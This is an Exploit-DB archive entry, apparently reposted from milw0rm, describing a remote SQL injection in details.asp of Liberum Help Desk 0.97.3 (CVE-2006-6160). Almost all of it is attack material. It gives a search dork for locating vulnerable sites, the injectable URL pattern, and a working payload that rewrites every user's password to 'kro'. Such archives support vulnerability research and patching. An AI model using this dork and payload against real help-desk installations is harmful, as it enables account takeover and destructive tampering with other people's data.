Liberum Help Desk 0.97.3 - SQL Injection
Author: ajann
type: webapps
platform: asp
port:
date_added: 2006-11-24
date_updated: 2017-01-05
verified: 1
codes: OSVDB-34033;CVE-2006-6160
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comliberum-hd-0.97.3.zip
*******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
*******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL]
Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro"
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-25]